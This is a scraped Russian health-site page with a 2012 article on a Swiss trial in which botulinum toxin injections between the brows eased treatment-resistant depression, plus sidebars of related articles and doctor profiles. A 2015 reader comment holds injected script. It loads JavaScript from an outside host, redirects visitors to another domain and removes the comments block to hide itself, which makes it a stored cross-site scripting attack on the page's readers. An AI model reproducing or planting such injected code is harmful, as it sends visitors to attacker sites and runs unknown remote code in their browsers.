Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ботокс – спасение от депр...  >>  Ботокс – спасение от депрессии
 
Обратная связь
 

Ботокс – спасение от депрессии

Размер шрифта
23 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Швейцарские ученые обнаружили, что побочный эффект ботулотоксина можно использовать для лечения депрессии.

Ботокс - спасение от депрессии

Что такое ботулотоксин

Ботулотоксин (ботулинический токсин) – нейротоксин, который вырабатывают бактерии Clostridium botulinum. При попадании в организме человека ботулотоксин воздействует на нервную систему и приводит к развитию тяжелого заболевания – ботулизма. Однако врачи научились использовать ботулотоксин «в мирных целях». Благодаря тому, что ботулотоксин блокирует нервно-мышечную передачу, его активно используют в косметологии.

В результате инъекции ботулотоксина удается разгладить морщины на лбу, в углах глаз, на переносице и спинке носа. Под действием ботулотоксина нарушается передача нервных импульсов к мышцам, в результате чего наступает ослабление двигательной активности мышц. Для введения препарата используются тонкие иглы, с помощью которых препарат вводят в мышцы. Препарат начинает действовать в среднем через 7-14 дней; действие препарата длится от 2 до 8 месяцев.

Суть исследования

Многие люди, использующие ботулотоксин в косметических целях, жалуются на то, что лицо теряет мимику и выразительность. Ученые решили использовать этот побочный эффект ботулотоксина для лечения депрессии, которая не поддается воздействию антидепрессантов.

Участников исследования разделили на две группы (основную и контрольную) и сделали инъекции в межбровье и надбровье. Участники основной группы получили инъекции ботулотоксина, а участники контрольной группы – инъекции физиологического раствора. Через 6 недель после введения ботулотоксина симптомы депрессии уменьшились на 47%, тогда как после введения физиологического раствора лишь на 9%. Положительный эффект от введения ботулотоксина сохранялся в течение 16 недель.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сладкие газировки вызывают депрессию   Болезни-близнецы. Депрессия и гипотиреоз   Признаки депрессии у близкого человека   Причины депрессии, о которых вы не подозревали. Часть 1  
01 апреля 2013Сладкие газировки вызывают депрессию 22 ноября 2012Ботокс – спасение от депрессии
 
20 июля 2011Антидепрессанты приводят к депрессии 27 ноября 2012Ботокс помогает при недержании мочи
 

Слайдшоу

1
Вся правда о депрессии
От чего умер Робин Уильямс?
Мифы и факты о депрессии

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.